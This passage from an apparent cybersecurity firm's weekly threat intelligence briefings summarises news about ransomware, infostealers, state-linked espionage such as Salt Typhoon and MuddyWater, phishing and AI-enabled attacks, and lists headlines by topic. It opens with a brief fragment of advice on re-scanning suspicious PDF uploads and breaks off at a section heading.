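Treat an "allow" as provisional whenever hidden_content() is true: decompress the object streams with a PDF parsing library and re-run the scan before letting the file through. The check is a gate for mail and upload pipelines, not a substitute for sandbox detonation of anything that scores "review" or "block".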

Infostealers: The Silent Smash-and-Grab Driving Modern Cyber Crime

Infostealers have rapidly become one of the most damaging tools in modern cyber crime, operating as silent data theft mechanisms that can compromise systems in minutes. Once requiring specialist skills, these tools are now widely available for purchase, driving a surge in attacks by less technical criminals. Stolen information, ranging from passwords and corporate VPN access to cloud credentials, is sold at scale on criminal marketplaces and has enabled major breaches such as the 2024 Snowflake incident, which affected more than 160 organisations. Their speed, stealth, and accessibility make them a growing risk for businesses worldwide.

https://www.securityweek.com/infostealers-the-silent-smash-and-grab-driving-modern-cybercrime/

New Cyber Threats Emerge as Old Ransomware Groups Collapse

Ransomware attacks have risen by 179% since mid-2024, fuelled by new criminal groups stepping in as law enforcement disrupts older gangs. Some now focus solely on extortion by stealing data rather than locking systems, while others recycle leaked code or rebrand under fresh names. At the same time, state-linked actors are targeting government, legal, and technology sectors, often exploiting weaknesses in cloud services and third-party providers to reach wider victims. The use of artificial intelligence and advanced malware highlights that while well-known groups may collapse, the overall threat to organisations remains undiminished and increasingly sophisticated.

https://techinformed.com/new-cyber-threats-emerge-as-old-ransomware-groups-collapse/

Ransomware Cyber Attack Virtually Shuts Down Entire US State

A major ransomware cyber attack has disrupted multiple state agencies in Nevada, including the Department of Motor Vehicles and the Gaming Control Board which oversees operations on the Las Vegas Strip. The incident has forced some police departments to revert to manual record-keeping and disrupted public benefit services. While officials first reported no loss of personal data, evidence has since confirmed that some information was stolen. The Governor’s office continues to monitor the situation, but the scale of the breach and recovery timeline remain uncertain, with the FBI now leading investigations and warning citizens to be alert to related scams.

https://www.independent.co.uk/bulletin/news/nevada-cyber-attack-hacking-ransomware-b2816108.html

Chinese Threat Actor Salt Typhoon Cyber Spies Breached 80+ Nations, FBI Warns

The FBI, alongside security agencies from more than a dozen nations including the UK’s NCSC, has warned that a Chinese state-sponsored group known as Salt Typhoon has breached critical infrastructure in over 80 countries, including more than 200 organisations in the US alone. Active since 2019, the group has targeted sectors ranging from telecommunications and transport to defence and government, using stealthy methods to infiltrate routers, surveillance systems, and even lawful intercept tools. Authorities say Salt Typhoon remains active, with hidden re-entry points making removal difficult, and urge organisations to strengthen defences and adopt continuous monitoring practices.

https://www.techrepublic.com/article/news-salt-typhoon-cyber-spies-breach/


Governance, Risk and Compliance

Boards should bear ultimate responsibility for cybersecurity - BetaNews

Cyber moves from back office to boardroom – and investors are paying attention | TechRadar

Financial sector faces surge in cyber threats - BetaNews

Incident response planning emerges as a key cybersecurity control in reducing cyber risk: Marsh McLennan Cyber Risk Intelligence Center report

Tabletop drills cut cyber event likelihood by 13% – report - CIR Magazine

KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge - IT Security Guru

Cyber Insurers May Limit Payouts for Breaches via Flaws

Personal Liability, Security Big Issues for CISOs

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

CISOs Evolve from Guardians to Strategic Business Architects

Cyber pros say the buck stops with the board when it comes to security failings | IT Pro

Concealing cyberattacks risks penalties and harms trust - BetaNews

The Biggest Technology Risk to Organizations is Failing to Plan for Cybersecurity Chaos - Security Boulevard

Cyber security response rising up the agenda

How Boards Can Prepare for Increasing Nation-State Cyber Threats

Building Human Firewalls: Key to Combating Cyber Threats

The evolving CISO role: bridging the gap between security and strategy | TechRadar

CIISec: Most Security Professionals Want Stricter Regulations - Infosecurity Magazine

Regulatory compliance: Act now | TechRadar

Cyber Outlook Report Finds Gaps, Outlines Holistic Approach to Protections

5 Practices to Ensure Your Ecosystem Is Cyber-Secure

How CISOs are balancing risk, pressure and board expectations - Help Net Security

Finding connection and resilience as a CISO - Help Net Security


Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attack volumes up nearly three times on 2024 | Computer Weekly

New cyber threats emerge as old ransomware groups collapse

Storm-0501 attacked Azure, demanded payment via Teams • The Register

AI Boosts Ransomware Attacks 70%, Fueling Cybersecurity Arms Race

Cybersecurity company ESET warns AI now being used in ransomware attacks - Business Plus

Criminals Are Vibe Hacking With AI To Carry Out Ransoms At Scale: Anthropic

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Organized and Criminal, Ransomware Gangs Run Up Profits  - Security Boulevard

Blue Locker ransomware hits critical infrastructure – is your organisation ready? - Exponential-e Blog

First AI-powered ransomware PoC spotted • The Register

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Hook Android Trojan Delivers Ransomware-Style Attacks

Underground Ransomware Gang With New Tactics Against Organizations Worldwide

Cephalus ransomware: What you need to know | Fortra

Emulating the Expedited Warlock Ransomware - Security Boulevard

Experimental PromptLock ransomware uses AI to encrypt, steal data

Someone Created the First AI-Powered Ransomware Using OpenAI's gpt-oss:20b Model

‘Vibe-hacking’ is now a top AI threat | The Verge

When ransomware hits home: putting your people first | TechRadar

Akira, Cl0p Top "5 Most Active Ransomware Groups" List

AI Meets Ransomware, The New Cyber Threat | Scoop News

Ransomware Gangs Are Bleeding the Healthcare Supply Chain | MSSP Alert

Ransomware Victims

Ransomware cyber attack virtually shuts down US state | The Independent

When One Hospital Gets Ransomware, Others Feel the Pain

Qilin Ransomware Hits Nissan: 4TB of Vehicle Designs Stolen

Electronics manufacturer Data I/O took offline operational systems following a ransomware attack

Data I/O ransomware attack ‘temporarily impacted’ operations • The Register

Phishing & Email Based Attacks

'ZipLine' Phishers Flip Script as Victims Email First

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Microsoft urges to limit CLI tools as phishing rages | Cybernews

Fast-Spreading, Complex Phishing Campaign Installs RATs

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Off-the-shelf tools make life easier for phishing attackers - BetaNews

New Phishing Campaign Abuses ConnectWise ScreenConnect to Take Over De - Infosecurity Magazine

Hackers Exploit Linux RAR Flaws in Phishing to Deploy VShell Backdoor

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Google Breach Exposes 2.5 Billion Gmail Accounts to Phishing Attacks

Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing

What small businesses must do now to stay ahead of phishing | SC Media

Other Social Engineering

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Fake CAPTCHA tests trick users into running malware • The Register

How social engineering is the weakest link in cyber defence

New Attack Tricks AI Summaries Into Pushing Malware

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Fake Apple Support Sites Spread Malware Evading macOS Defenses

What is SIM swap attack (SIM intercept attack)? | Definition from TechTarget

Attackers exploit Zoom and Teams impersonations to deliver ScreenConnect malware - SiliconANGLE

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Can We Really Eliminate Human Error in Cybersecurity?  - Security Boulevard

ScreenConnect admins targeted with spoofed login alerts - Help Net Security

Crooks are getting ready for FIFA World Cup 2026 | Cybernews

Fraud, Scams and Financial Crime

Operation Serengeti 2.0: INTERPOL nabs 1,209 cybercriminals in Africa, seizes $97M

iPhone Users 20% More Likely to Fall for Scams Than Android, Study Shows

ScamAgent shows how AI could power the next wave of scam calls - Help Net Security

bne IntelliNews - Cyber criminals steal $339mn from thousands of victims in Zambia, Angola and Ivory Coast

Dangerous Android banking trojan found lurking in malicious apps with 19 million installs — don’t fall for this | Tom's Guide

Anatsa Android Banking Trojan Now Targeting 830 Financial Apps - SecurityWeek

Crypto Companies Freeze $47m in Romance Baiting Funds - Infosecurity Magazine

Crooks are getting ready for FIFA World Cup 2026 | Cybernews

FCC removes 1,200 voice providers from telephone networks in major robocall crackdown | CyberScoop

69% of Consumers Believe AI Fraud Is the Biggest Identity Threat | Security Magazine

Artificial Intelligence

New Attack Tricks AI Summaries Into Pushing Malware

AI Boosts Ransomware Attacks 70%, Fueling Cybersecurity Arms Race

Criminals Are Vibe Hacking With AI To Carry Out Ransoms At Scale: Anthropic

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

New research finds AI agents exploiting valid credentials to bypass traditional security controls in enterprises | TechRadar

Agentic AI coding assistant helped attacker breach, extort 17 distinct organizations - Help Net Security

ScamAgent shows how AI could power the next wave of scam calls - Help Net Security

Cybersecurity company ESET warns AI now being used in ransomware attacks - Business Plus

Experimental PromptLock ransomware uses AI to encrypt, steal data

‘Vibe-hacking’ is now a top AI threat | The Verge

Rowhammer attack can backdoor AI models with one devastating bit flip | CSO Online

AI Security Map: Linking AI vulnerabilities to real-world impact - Help Net Security

Anthropic Warns of ‘Sophisticated’ Cybercrime Via Claude LLM

LLMs Face Persistent Prompt Injection Vulnerabilities

We Are Still Unable to Secure LLMs from Malicious Inputs - Security Boulevard

Detecting and countering misuse of AI: August 2025 \ Anthropic

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

69% of Consumers Believe AI Fraud Is the Biggest Identity Threat | Security Magazine

The 5 Golden Rules of Safe AI Adoption

The do’s and don’ts of vibe coding - Fast Company

Researchers warn of security flaws in AI-powered browsers | TechSpot

Anthropic thwarts hacker attempts to misuse Claude AI for cybercrime | Reuters

OpenAI increases ChatGPT user protections following wrongful death lawsuit | ZDNET

Malware

New Attack Tricks AI Summaries Into Pushing Malware

Fake CAPTCHA tests trick users into running malware • The Register

Infostealers: The Silent Smash-and-Grab Driving Modern Cybercrime - SecurityWeek

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Fake Apple Support Sites Spread Malware Evading macOS Defenses

Attackers exploit Zoom and Teams impersonations to deliver ScreenConnect malware - SiliconANGLE

Fast-Spreading, Complex Phishing Campaign Installs RATs

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Over 300 entities hit by a variant of Atomic macOS Stealer in recent campaign

Macs under attack from dangerous new info-stealing malware — how to stay safe | Tom's Guide

Fake macOS Help Sites Seek to Spread Infostealer in Targeted Campaign - Infosecurity Magazine

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

The hidden threat in enterprise security: why it’s time to rethink PDFs | TechRadar

TamperedChef Malware Disguised as Fake PDF Editors Steals Credentials and Cookies

Hackers Exploit Linux RAR Flaws in Phishing to Deploy VShell Backdoor

Bots/Botnets

GeoServer Exploits, PolarEdge, and Gayfemboy Push Cybercrime Beyond Traditional Botnets

IoT under siege: The return of the Mirai-based Gayfemboy Botnet

Mobile

New Android Trojan Variant Expands with Ransomware Tactics - Infosecurity Magazine

iPhone Users 20% More Likely to Fall for Scams Than Android, Study Shows

Anatsa Android Banking Trojan Now Targeting 830 Financial Apps - SecurityWeek

Hook Android Trojan Delivers Ransomware-Style Attacks

Google Deletes Millions of Android Apps After Malware Discovery

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

Threat Actors Adapting Android Droppers Even to Deploy Simple Malware to Stay Future-Proof

Google to Verify All Android Developers in 4 Countries to Block Malicious Apps

Russia orders state-backed MAX messenger app, a WhatsApp rival, pre-installed on phones and tablets | Reuters

Android.Backdoor.916.origin malware targets Russian business executives

New Android malware poses as antivirus from Russian intelligence agency

Denial of Service/DoS/DDoS

Global DDoS attacks exceed 8M amid geopolitical tensions

Telco DDoS threat on the rise amid geopolitical unrest | TelecomTV

Arch Linux remains under attack as DDoS enters week 2 - here's a workaround | ZDNET

Internet of Things – IoT

IoT under siege: The return of the Mirai-based Gayfemboy Botnet

Camera Hacking — America’s Cyber Defense Agency Issues Warning

Cyberterrorism and the Connected Car: The Growing Threat To Automotive Security | SC Media UK

IoT security challenges, issues and best practices - Security Boulevard

The Risk of Consumer Devices in the Hybrid Workforce

Your car could be at risk – new Flipper Zero craze sees car thieves use cheap hacking device, and there's no easy fix | TechRadar

Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data | TechCrunch

Data Breaches/Leaks

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

Google Breach Exposes 2.5 Billion Gmail Accounts to Phishing Attacks

User data posted on the dark web after massive telecom hack in Europe, should you worry? - PhoneArena

Hackers claim millions of PayPal accounts leaked while experts say the data looks suspiciously cheap and possibly stolen from old infostealer logs | TechRadar

DOGE employees uploaded Social Security database to ‘vulnerable’ cloud, agency whistleblower says | FedScoop

Data Breach Strikes Criminal Records Service Firm APCS | SC Media UK

74% of companies admit insecure code caused a security breach | IT Pro

Google warns Salesloft breach impacted some Workspace accounts

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

89 Million Steam Accounts Compromised: Change Your Password Now - Security Boulevard

Farmers Insurance data breach impacts 1.1M people after Salesforce attack

Auchan retailer data breach impacts hundreds of thousands of customers

Leaked Intel database reveals how a simple login flaw exposed 270,000 employees and shattered confidence in corporate digital defenses | TechRadar

Tencent Cloud leaves critical data open for months | Cybernews

IT system supplier cyberattack impacts 200 municipalities in Sweden

MoD staff were warned not to share hidden data before Afghan leak - BBC News

TransUnion says hackers stole 4.4 million customers' personal information | TechCrunch

Discord hackers claim to have leaked billions of messages as millions of users targeted - here's what we know | TechRadar

Government faces questions after review of 11 major UK data breaches | Data protection | The Guardian

Nissan confirms design studio data breach claimed by Qilin ransomware

iiNet Data Breach Exposes 280,000 Customers' Emails and Addresses

Church of England abuse victims exposed by lawyer's email • The Register

90K exposed after sleep therapy provider data breach | Cybernews

Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data | TechCrunch

Organised Crime & Criminal Actors

Dark Reading Confidential: Guided Tour of the Dark Web

bne IntelliNews - Cyber criminals steal $339mn from thousands of victims in Zambia, Angola and Ivory Coast

FBI, Dutch cops seize fake ID marketplace, servers • The Register

A hacker used AI to automate an ‘unprecedented’ cybercrime spree, Anthropic says – DataBreaches.Net

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Crypto Companies Freeze $47m in Romance Baiting Funds - Infosecurity Magazine

Insider Risk and Insider Threats

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

How social engineering is the weakest link in cyber defence

A disgruntled worker built his own kill-switch malware to take down his former employer - and it didn't pay off | TechRadar

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Can We Really Eliminate Human Error in Cybersecurity? - Security Boulevard

When ransomware hits home: putting your people first | TechRadar

Building Human Firewalls: Key to Combating Cyber Threats

Another US Navy Sailor Was Just Busted Spying for China - The National Interest

Insurance

Cyber Insurers May Limit Payouts for Breaches via Flaws

Cyber Outlook Report Finds Gaps, Outlines Holistic Approach to Protections

Cyber insurance still has a problem with modelling - Tech Monitor

Supply Chain and Third Parties

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

Murky Panda hackers exploit cloud trust to hack downstream customers

5 Practices to Ensure Your Ecosystem Is Cyber-Secure

IT system supplier cyberattack impacts 200 municipalities in Sweden

Ransomware Gangs Are Bleeding the Healthcare Supply Chain | MSSP Alert

When Partners Become Cybersecurity Risks

Cloud/SaaS

Murky Panda hackers exploit cloud trust to hack downstream customers

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Silk Typhoon Attacks North American Orgs in the Cloud

DOGE employees uploaded Social Security database to ‘vulnerable’ cloud, agency whistleblower says | FedScoop

Tencent Cloud leaves critical data open for months | Cybernews

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Attackers Abuse Virtual Private Servers to Compromise SaaS Accounts - Infosecurity Magazine

How much do you trust your cloud? Hackers exploit weakness to target customers - here's what we know | TechRadar

Rising Cloud Security Threats: Exploits, Breaches, and Defenses

ScreenConnect admins targeted with spoofed login alerts - Help Net Security

AWS Trusted Advisor Tricked Into Showing Unprotected S3 Buckets as Secure - SecurityWeek

Online PDF Editors Safe to Use? Detailed Analysis of Security Risks Associated With It

Outages

Microsoft working on fix for ongoing Outlook email issues

Identity and Access Management

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Report declares 'identity crisis' amid rising login attacks • The Register

Identity Security Silos: An Attacker's Best Ally

Encryption

Quantum Computing Threatens Encryption: Shift to Post-Quantum Crypto

Linux and Open Source

Arch Linux remains under attack as DDoS enters week 2 - here's a workaround | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Hackers Can Exfiltrate Windows Secrets and Credentials Silently by Evading EDR Detection

Report declares 'identity crisis' amid rising login attacks • The Register

Billions of Gmail users advised to change passwords | The Independent

New research finds AI agents exploiting valid credentials to bypass traditional security controls in enterprises | TechRadar

Enterprise passwords becoming even easier to steal and abuse | CSO Online

Everyone should know which passwords suck. Do you? | PCWorld

Hackers are looking to steal Microsoft logins using some devious new tricks - here's how to stay safe | TechRadar

89 Million Steam Accounts Compromised: Change Your Password Now - Security Boulevard

Password managers vulnerable: 40 million users at risk of stolen data | PCWorld

Social Media

Meta might be secretly scanning your phone's camera roll - how to check and turn it off | ZDNET

Social media apps that aggressively harvest user data - Help Net Security

Regulations, Fines and Legislation

CIISec: Most Security Professionals Want Stricter Regulations - Infosecurity Magazine

Cybersecurity Obligations Under EU NIS 2 Directive

Regulatory compliance: Act now | TechRadar

Attacks on VPNs are unjustified and dangerous – and it's not how we achieve online safety | Tom's Guide

FCC Bars China from Undersea Cables to Combat Espionage Risks

ENISA to manage €36M EU Cybersecurity Reserve ...

4chan will refuse to pay daily UK fines, its lawyer tells BBC

Gaps in California Privacy Law: Brokers Ignore Requests

Apple warns UK against introducing tougher tech regulation - BBC News

Non-Compliance with CMMC Could Put Your DoD Contracts at Risk | Offit Kurman - JDSupra

Models, Frameworks and Standards

Cybersecurity Obligations Under EU NIS 2 Directive

ENISA to manage €36M EU Cybersecurity Reserve ...

NIST Releases Control Overlays to Manage Cybersecurity Risks in Use and Developments of AI Systems

Regulatory compliance: Act now | TechRadar

Hungary extends cybersecurity registration obligations for entities falling under NIS2

ENISA to Coordinate €36m EU-Wide Incident Response Scheme - Infosecurity Magazine

Beyond GDPR security training: Turning regulation into opportunity

Non-Compliance with CMMC Could Put Your DoD Contracts at Risk | Offit Kurman - JDSupra

Data Protection

Gaps in California Privacy Law: Brokers Ignore Requests

Careers, Working in Cyber and Information Security

83% of CISOs say staff shortage is major issue for defense | CSO Online

The Career Delta: Navigating AI, Cybersecurity and Change

Cybersecurity Workforce Trends in 2025 - Skills Gap, Diversity and SOC Readiness

Law Enforcement Action and Take Downs

A disgruntled worker built his own kill-switch malware to take down his former employer - and it didn't pay off | TechRadar

Interpol cybercrime crackdown in Africa leads to the arrest of over 1,200 suspects - ABC News

Interpol-led crackdown disrupts cybercrime networks in Africa that caused $485 million in losses | CyberScoop

Operation Serengeti 2.0: INTERPOL nabs 1,209 cybercriminals in Africa, seizes $97M

FCC removes 1,200 voice providers from telephone networks in major robocall crackdown | CyberScoop

FBI, Dutch cops seize fake ID marketplace, servers • The Register

Yemen Cyber Army hacker jailed after stealing millions of people’s data • Graham Cluley

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

FCC Bars China from Undersea Cables to Combat Espionage Risks

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Nation State Actors

How Boards Can Prepare for Increasing Nation-State Cyber Threats

China

Murky Panda hackers exploit cloud trust to hack downstream customers

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Silk Typhoon Attacks North American Orgs in the Cloud

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

UK and 12 allies issue warning over Chinese cyber attacks on ‘critical sectors’ | The Standard

Global Salt Typhoon hacking campaigns linked to Chinese tech firms

Global DDoS attacks exceed 8M amid geopolitical tensions

Telco DDoS threat on the rise amid geopolitical unrest | TelecomTV

Chinese Telecom Hackers Strike Worldwide - GovInfoSecurity

Salt Typhoon Exploits Cisco, Ivanti, Palo Alto Flaws to Breach 600 Organizations Worldwide

Another US Navy Sailor Was Just Busted Spying for China - The National Interest

Silk Typhoon hackers hijack network captive portals in diplomat attacks

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

FCC Bars China from Undersea Cables to Combat Espionage Risks

Russia

Putin’s New Cyber Empire | Foreign Affairs

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

US DoD reportedly relies on utility written by Russian • The Register

Russia orders state-backed MAX messenger app, a WhatsApp rival, pre-installed on phones and tablets | Reuters

New Android malware poses as antivirus from Russian intelligence agency

Android.Backdoor.916.origin malware targets Russian business executives

North Korea

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Tools and Controls

Incident response planning emerges as a key cybersecurity control in reducing cyber risk: Marsh McLennan Cyber Risk Intelligence Center report

Tabletop drills cut cyber event likelihood by 13% – report - CIR Magazine

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Hackers Can Exfiltrate Windows Secrets and Credentials Silently by Evading EDR Detection

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Cyber Insurers May Limit Payouts for Breaches via Flaws

Cyber insurance still has a problem with modelling - Tech Monitor

74% of companies admit insecure code caused a security breach | IT Pro

Cyber security response rising up the agenda

Public sector cyber leaders are tired of clunky, outdated tools | IT Pro

Surge in coordinated scans targets Microsoft RDP auth servers

ENISA to Coordinate €36m EU-Wide Incident Response Scheme - Infosecurity Magazine

Report declares 'identity crisis' amid rising login attacks • The Register

Attackers Abuse Virtual Private Servers to Compromise SaaS Accounts - Infosecurity Magazine

The do’s and don’ts of vibe coding - Fast Company

The perils of vibe coding

The Biggest Technology Risk to Organizations is Failing to Plan for Cybersecurity Chaos - Security Boulevard

10 common file-sharing security risks and how to prevent them | TechTarget

Free VPN apps found to have ties with Russia and China – and they're hiding in Google and Apple’s app stores | TechRadar

Attacks on VPNs are unjustified and dangerous – and it's not how we achieve online safety | Tom's Guide

Identity Security Silos: An Attacker's Best Ally

AWS Trusted Advisor Tricked Into Showing Unprotected S3 Buckets as Secure - SecurityWeek

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

Why SIEM Rules Fail and How to Fix Them: Insights from 160 Million Attack Simulations

How Bug Bounty Programs Can Help Combat Ransomware Attacks - The Daily Upside

Google previews cyber ‘disruption unit’ as US government, industry weigh going heavier on offense | CyberScoop

Google is getting ready to 'hack back' as US considers shifting from cyber defense to offense — new 'Scam Farms' bill opens up new retaliatory hacking actions | Tom's Hardware

Password managers vulnerable: 40 million users at risk of stolen data | PCWorld

The 5 Golden Rules of Safe AI Adoption

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025

Black Arrow Cyber Threat Intelligence Briefing 22 August 2025:

-85% of Organisations Approach Cyber Security Reactively

-25% of Security Leaders Replaced After Ransomware Attack

-Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide

-Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations

-‘Impersonation as a Service’ the Next Big Thing in Cybercrime

-URL-Based Threats Become a Go-To Tactic for Cybercriminals

-How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats

-How GenAI Complacency is Becoming Cyber Security’s Silent Crisis

-Fake Employees Pose Real Security Risks

-AI Gives Ransomware Gangs a Deadly Upgrade

-DORA: Six Months into a Resilience Revolution

-Why Your Security Culture is Critical to Mitigating Cyber Risk

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week we start with a look at how organisations react to cyber incidents: studies show that most organisations only prioritise their security after they have been attacked, and one in four CISOs lose their job after a ransomware attack even when the incident stems from factors outside their direct control. We discuss emerging attacks, including those focused on CFOs and regulators, and the hiring of English language speakers to help in social engineering attacks. We also spotlight attacks using remote access trojans, and the risks of complacency when using AI at a time when AI itself continues to boost attackers.

Looking ahead, Gartner warns that by 2028 up to one in four job candidates could be artificially generated with associated security risks. Focusing on solutions to address cyber risks, we look at the impact of the EU’s DORA law that aims to build better resilience in the financial services sector. Finally, on the basis that the majority of cyber attacks involve people, including the social engineering attacks referred to earlier, we look at how a security culture is critical to helping to protect your organisation.

Top Cyber Stories of the Last Week

85% of Organisations Approach Cyber Security Reactively

Unisys has found that 85% of organisations still approach cyber security reactively, responding only after an incident has occurred. While 62% have adopted or plan to adopt zero trust models, fewer than half use artificial intelligence to strengthen defences. Most acknowledge they are not prepared for future threats such as quantum-enabled attacks. The consequences are costly, with nearly half estimating downtime expenses of at least $500,000 per hour. The findings highlight the urgent need for a proactive and layered security strategy that combines advanced technology with strong human oversight.

https://www.securitymagazine.com/articles/101842-85-of-organizations-approach-cybersecurity-reactively

25% of Security Leaders Replaced After Ransomware Attack

A new Sophos report has revealed that one in four security leaders lose their role following a ransomware attack, regardless of whether they were directly at fault. The findings highlight growing board-level frustration when security measures fail, even if breaches stem from business decisions outside the CISO’s authority. The study found that email-based attacks (malicious emails and phishing) were the root cause in 37% of incidents, exploited system weaknesses in 32% of cases, and stolen passwords in 23%. The report warns that many incidents arise from known gaps that were left unaddressed, making leadership accountability a critical issue.

https://www.csoonline.com/article/4040156/25-of-security-leaders-replaced-after-ransomware-attack.html

Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide

A new cyber espionage campaign linked to the group known as MuddyWater is targeting Chief Financial Officers and finance leaders worldwide. The attackers use highly convincing phishing emails that mimic recruitment messages, tricking victims into completing fake verification challenges before delivering malicious files. Once inside, they install legitimate tools such as OpenSSH and NetBird to create hidden backdoors, enable remote access, and even set up secret administrator accounts. This approach gives the attackers long term access while avoiding detection, highlighting the increasing sophistication of threats aimed directly at senior financial executives.

https://cybersecuritynews.com/apt-muddywater-attacking-cfos/

Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations

The Canadian Investment Regulatory Organisation (CIRO) has disclosed a cyber security breach that exposed personal data from some member firms and their employees. The regulator detected the attack on 11 August and temporarily shut down systems to protect operations while an investigation was launched with external experts and law enforcement. Although investor funds were not affected, the incident raises concern given CIRO’s role in overseeing Canada’s investment and trading firms. CIRO has committed to notifying affected individuals, offering risk mitigation services, and warning members to be alert to fraudulent calls or emails pretending to be the regulator.

https://www.infosecurity-magazine.com/news/canadian-financial-regulator-hacked/

‘Impersonation as a Service’ the Next Big Thing in Cybercrime

Criminal groups are increasingly offering “impersonation as a service,” where skilled English-speaking fraudsters are hired to trick employees into handing over access to company systems. Reports show such roles being advertised on underground forums have more than doubled since 2024, signalling that targeted social engineering attacks are set to rise. Recent incidents have seen attackers exploit trust through convincing phone calls to breach major firms including Google, Dior, and Allianz. Combined with advances in artificial intelligence and collaboration between criminal groups, this trend represents a growing and highly professionalised threat to businesses worldwide.

https://www.theregister.com/2025/08/21/impersonation_as_a_service/

URL-Based Threats Become a Go-To Tactic for Cybercriminals

Proofpoint has reported that cyber criminals are increasingly favouring malicious links over attachments, with URL-based threats now four times more common than file-based attacks. In the first half of 2025 alone, more than 3.7 billion attempts were made to steal user logins through phishing, and QR code scams exceeded 4.2 million cases. Smishing, or text-based phishing, has surged by more than 2,500%, showing a clear shift towards targeting mobile devices. These campaigns often mimic trusted brands or government services, making them difficult for people to recognise and highlighting the need for stronger human-focused cyber security measures.

https://www.helpnetsecurity.com/2025/08/21/phishing-url-based-threats/

How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats

Remote access trojans or RATs (malware that gives attackers full control of a victim’s computer) are becoming more sophisticated, using everyday tools and file formats to avoid detection while maintaining long-term access to systems. Recent attacks have shown how criminals use phishing emails, built-in Windows functions, and even artificial intelligence to launch stealthy campaigns that can quietly steal sensitive data for weeks. Traditional security approaches that rely on signatures or isolated defences are proving inadequate. Experts recommend a shift to behaviour-based monitoring that links endpoint, network, and identity activity, helping organisations detect unusual patterns earlier and limit the damage caused by these evolving threats.

https://www.darkreading.com/cyberattacks-data-breaches/evolving-rats-redefine-enterprise-security-threats

How GenAI Complacency is Becoming Cyber Security’s Silent Crisis

